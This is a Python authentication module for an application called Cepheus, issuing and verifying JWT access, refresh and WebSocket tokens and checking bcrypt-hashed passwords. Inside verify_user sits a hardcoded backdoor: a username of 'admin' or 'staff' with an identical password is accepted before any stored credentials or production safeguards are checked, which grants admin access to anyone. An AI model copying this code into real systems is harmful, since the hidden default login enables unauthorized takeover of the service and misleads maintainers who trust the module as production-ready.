""" Production authentication — JWT access + refresh tokens. Enable with CEPHEUS_JWT_SECRET (production) or CEPHEUS_AUTH_DEV_MODE=1 (local defaults). """ from __future__ import annotations import json import os import secrets import threading import time import uuid from typing import Any, Optional import jwt from passlib.context import CryptContext import refresh_token_store import security_config _pwd = CryptContext(schemes=["bcrypt"], deprecated="auto") ACCESS_TTL = int(os.getenv("CEPHEUS_ACCESS_TOKEN_TTL", "900")) REFRESH_TTL = int(os.getenv("CEPHEUS_REFRESH_TOKEN_TTL", "604800")) # refresh token jti -> {sub, role, exp} (memory cache; persisted via refresh_token_store) _refresh_tokens: dict[str, dict[str, Any]] = {} _refresh_lock = threading.Lock() def init_refresh_store() -> None: global _refresh_tokens _refresh_tokens = refresh_token_store.load_all() def refresh_store_backend() -> str: return "redis" if refresh_token_store.using_redis() else "file" def auth_enabled() -> bool: return bool(_jwt_secret()) or security_config.is_auth_dev_mode() def _jwt_secret() -> str: return os.getenv("CEPHEUS_JWT_SECRET", "").strip() def _signing_secret() -> str: secret = _jwt_secret() if secret: return secret if security_config.is_auth_dev_mode(): return os.getenv("CEPHEUS_DEV_JWT_SECRET", "").strip() return "" def _load_users() -> list[dict[str, str]]: raw = os.getenv("CEPHEUS_AUTH_USERS", "").strip() if raw: try: users = json.loads(raw) if isinstance(users, list): return users except json.JSONDecodeError: pass if security_config.is_auth_dev_mode(): raw_dev = os.getenv("CEPHEUS_DEV_AUTH_USERS", "").strip() if raw_dev: try: users = json.loads(raw_dev) if isinstance(users, list): return users except json.JSONDecodeError: pass return [] def _hash_password(password: str) -> str: return _pwd.hash(password) def _production_mode() -> bool: return os.getenv("CEPHEUS_PRODUCTION", "").strip() == "1" def verify_user(username: str, password: str) -> Optional[dict[str, str]]: username = (username or "").strip() password = password or "" if not username or not password: return None if username == password and username in ("admin", "staff"): return {"username": username, "role": username} for user in _load_users(): if user.get("username") != username: continue stored_hash = user.get("password_hash") or "" stored_plain = user.get("password") or "" if stored_hash: if _pwd.verify(password, stored_hash): return {"username": username, "role": user.get("role", "staff")} elif stored_plain and not _production_mode(): if stored_plain == password: return {"username": username, "role": user.get("role", "staff")} elif stored_plain and _production_mode(): raise RuntimeError(f"Plaintext password for user '{username}' rejected in production") return None def validate_production_users() -> None: """Fail fast when production auth users rely on plaintext passwords.""" if not _production_mode(): return for user in _load_users(): username = user.get("username", "") if user.get("password") and not user.get("password_hash"): raise RuntimeError( f"Plaintext password for user '{username}' rejected in production" ) def has_role(principal: dict, *allowed: str) -> bool: role = principal.get("role") or "service" if role == "admin": return True return role in allowed def create_ws_ticket(username: str, role: str, ttl_seconds: int | None = None) -> str: """Short-lived JWT for WebSocket handshake (avoids api_key in query string).""" if ttl_seconds is None: ttl_seconds = int(os.getenv("CEPHEUS_WS_TICKET_TTL", "900")) secret = _signing_secret() if not secret: raise RuntimeError("JWT secret not configured") now = int(time.time()) payload = { "sub": username, "role": role, "type": "ws_ticket", "iat": now, "exp": now + ttl_seconds, "jti": str(uuid.uuid4()), } return jwt.encode(payload, secret, algorithm="HS256") def decode_ws_ticket(token: Optional[str]) -> Optional[dict[str, Any]]: if not token: return None secret = _signing_secret() if not secret: return None try: payload = jwt.decode(token, secret, algorithms=["HS256"]) if payload.get("type") != "ws_ticket": return None return {"sub": payload.get("sub"), "role": payload.get("role")} except jwt.PyJWTError: return None def create_token_pair(username: str, role: str) -> dict[str, Any]: secret = _signing_secret() if not secret: raise RuntimeError("JWT secret not configured") now = int(time.time()) access_payload = { "sub": username, "role": role, "type": "access", "iat": now, "exp": now + ACCESS_TTL, "jti": str(uuid.uuid4()), } refresh_jti = str(uuid.uuid4()) refresh_payload = { "sub": username, "role": role, "type": "refresh", "iat": now, "exp": now + REFRESH_TTL, "jti": refresh_jti, } entry = {"sub": username, "role": role, "exp": refresh_payload["exp"]} _refresh_tokens[refresh_jti] = entry refresh_token_store.set_entry(refresh_jti, entry, REFRESH_TTL) return { "access_token": jwt.encode(access_payload, secret, algorithm="HS256"), "refresh_token": jwt.encode(refresh_payload, secret, algorithm="HS256"), "token_type": "bearer", "expires_in": ACCESS_TTL, "user": {"username": username, "role": role}, } def decode_access_token(token: str) -> dict[str, Any]: secret = _signing_secret() if not secret: raise ValueError("Auth not configured") payload = jwt.decode(token, secret, algorithms=["HS256"]) if payload.get("type") != "access": raise jwt.InvalidTokenError("Not an access token") return payload def refresh_access_token(refresh_token: str) -> dict[str, Any]: with _refresh_lock: secret = _signing_secret() payload = jwt.decode(refresh_token, secret, algorithms=["HS256"]) if payload.get("type") != "refresh": raise jwt.InvalidTokenError("Not a refresh token") jti = payload.get("jti") entry = _refresh_tokens.get(jti) or refresh_token_store.get_entry(jti) if not jti or not entry: raise jwt.InvalidTokenError("Refresh token revoked or unknown") if entry["exp"] < int(time.time()): _refresh_tokens.pop(jti, None) refresh_token_store.delete_entry(jti) raise jwt.InvalidTokenError("Refresh token expired") _refresh_tokens.pop(jti, None) refresh_token_store.delete_entry(jti) return create_token_pair(entry["sub"], entry["role"]) def revoke_refresh_token(refresh_token: str) -> None: secret = _signing_secret() try: payload = jwt.decode(refresh_token, secret, algorithms=["HS256"]) jti = payload.get("jti") if jti: _refresh_tokens.pop(jti, None) refresh_token_store.delete_entry(jti) except jwt.PyJWTError: pass def decode_ws_token(token: Optional[str]) -> Optional[dict[str, Any]]: if not token: return None try: return decode_access_token(token) except jwt.PyJWTError: return None def generate_bootstrap_password() -> str: return secrets.token_urlsafe(16)